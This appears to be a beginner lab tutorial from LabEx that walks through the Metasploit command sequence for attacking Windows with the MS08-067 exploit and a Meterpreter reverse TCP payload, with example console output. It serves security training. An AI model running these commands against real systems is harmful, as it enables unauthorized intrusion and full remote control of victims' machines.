LabEx
Log InJoin Free

Use a Reverse Shell Payload in Metasploit

Kali LinuxBeginner
Practice Now

Introduction

In this lab, you will learn the fundamental steps of using a reverse shell payload within the Metasploit Framework. Metasploit is a powerful penetration testing tool that comes with a vast library of exploits, payloads, and auxiliary modules.

A "payload" is the code that runs on the target system after an exploit successfully compromises it. A "reverse shell" is a type of payload where the compromised target machine initiates a connection back to the attacker's machine. This technique is often used to bypass firewalls that might block incoming connections to the target but allow outgoing connections.

We will be using the windows/meterpreter/reverse_tcp payload. Meterpreter is an advanced, feature-rich payload that provides an interactive shell, allowing the attacker to execute commands, upload/download files, and perform many other post-exploitation activities.

By the end of this lab, you will understand the workflow for selecting an exploit, configuring a reverse shell payload, and launching the attack.

Select an exploit module for a target

In this step, we will launch the Metasploit Framework console and select an exploit module. An exploit is a piece of code that takes advantage of a specific vulnerability in a system. For this lab, we will use a well-known exploit for educational purposes.

First, open a terminal from your desktop.

Now, start the Metasploit console. We'll use the -q flag for a "quiet" launch, which suppresses the startup banner.

msfconsole -q

Once Metasploit is loaded, you will see the msf6 > prompt. This is the Metasploit command-line interface.

Our next action is to select an exploit. We will use the use command followed by the name of the exploit module. For this lab, we'll target the MS08-067 vulnerability, a classic and reliable exploit for older Windows systems.

Type the following command into the msf6 > prompt:

use exploit/windows/smb/ms08_067_netapi

After you press Enter, you'll notice that the prompt changes. It now includes the name of the selected exploit, indicating that you are in the context of this module.

msf6 > use exploit/windows/smb/ms08_067_netapi
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) >

You have now successfully selected an exploit module and are ready to configure it.

Set the payload to windows/meterpreter/reverse_tcp

In this step, you will set the payload for the selected exploit. A payload is the code that will be executed on the target machine after the exploit is successful. As mentioned in the introduction, we will use a reverse TCP Meterpreter payload.

Metasploit may have defaulted to this payload when you selected the exploit (as seen in the output from the previous step), but it's good practice to set it explicitly to ensure the correct payload is configured.

In the msf6 exploit(windows/smb/ms08_067_netapi) > prompt, use the set payload command:

set payload windows/meterpreter/reverse_tcp

After running the command, Metasploit will confirm the change.

payload => windows/meterpreter/reverse_tcp

To see all the options you can configure for the selected exploit and payload, you can use the show options command. This is a very useful command to see what parameters are required before launching an attack.

show options

You will see a list of module options, payload options, and exploit targets. Notice the RHOSTS and LHOST options, which we will configure in the next steps.

Set the RHOSTS option for the exploit

In this step, we will configure the RHOSTS option. RHOSTS stands for "Remote Host(s)" and it specifies the IP address of the target machine you want to attack.

For any exploit to work, you must tell Metasploit where to send it. The set command is used to configure these options.

In a real-world scenario, you would have identified a target's IP address through reconnaissance. For this lab, we will use a placeholder IP address.

At the msf6 exploit(...) > prompt, set the RHOSTS to 10.0.2.15.

set RHOSTS 10.0.2.15

Metasploit will confirm that the RHOSTS option has been set.

RHOSTS => 10.0.2.15

You have now told Metasploit which machine to target.

Set the LHOST option to your Kali IP address

In this step, we will set the LHOST option. LHOST stands for "Local Host" and it must be set to the IP address of your machine (the attacker's machine). This is a crucial step for a reverse shell, as it tells the compromised target where to connect back to.

To find your machine's IP address, you'll need to open a new terminal window. Do not close your existing msfconsole terminal. You can open a new terminal from the application menu.

In the new terminal, run the following command to display your network interface information:

ip addr show eth0

You will see output similar to this. Look for the inet address, which is your IP.

2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.2/16 brd 172.17.255.255 scope global eth0
       valid_lft forever preferred_lft forever

In the example above, the IP address is 172.17.0.2. Note down your IP address.

Now, switch back to your original terminal with the msfconsole prompt. Use the set command to configure LHOST with the IP address you just found. Replace YOUR_IP_ADDRESS with your actual IP.

set LHOST YOUR_IP_ADDRESS

For example, if your IP was 172.17.0.2, the command would be:

set LHOST 172.17.0.2

Metasploit will confirm the setting:

LHOST => 172.17.0.2

All necessary options are now configured.

Run the exploit and wait for the target to connect back

In this step, with all options configured, you will launch the exploit.

The exploit command (or its alias, run) tells Metasploit to start the listener for the reverse connection and then send the exploit to the target specified in RHOSTS.

At the msf6 exploit(...) > prompt, type:

exploit

Metasploit will now attempt to run the exploit against the target. You will see output like this:

[*] Started reverse TCP handler on 172.17.0.2:4444
[*] 10.0.2.15:445 - Attempting to trigger the vulnerability...
[-] 10.0.2.15:445 - Exploit failed: Rex::ConnectionRefused The connection was refused by the remote host (10.0.2.15:445).
[*] Exploit completed, but no session was created.

Important: In this lab environment, the exploit will fail because there is no actual vulnerable machine at the placeholder IP address 10.0.2.15. The output "Exploit completed, but no session was created" is expected.

If this were a real, vulnerable target, and the exploit was successful, you would see a message like "Meterpreter session 1 opened" and your prompt would change to meterpreter >, giving you full control over the target.

This completes the process of configuring and launching an exploit with a reverse shell payload. To exit Metasploit, type exit.

exit

Summary

In this lab, you have learned the fundamental workflow for using a reverse shell payload in the Metasploit Framework.

You practiced the following key steps:

  1. Starting the Metasploit console (msfconsole).
  2. Selecting an exploit module with the use command.
  3. Setting a payload with the set payload command.
  4. Configuring the necessary options, specifically RHOSTS (the target) and LHOST (your listener IP).
  5. Launching the attack with the exploit command.

You also learned the critical difference between RHOSTS and LHOST and why setting LHOST correctly is essential for a reverse shell to succeed. Although the exploit did not result in a session in this simulated environment, you have successfully executed all the commands required for a real-world attack. Congratulations on completing the lab!

Related Kali Linux Courses
Kali Linux for Beginners

Kali Linux for Beginners

cybersecuritykalilinux
Kali Server Exploitation in Action

Kali Server Exploitation in Action

cybersecuritykalilinux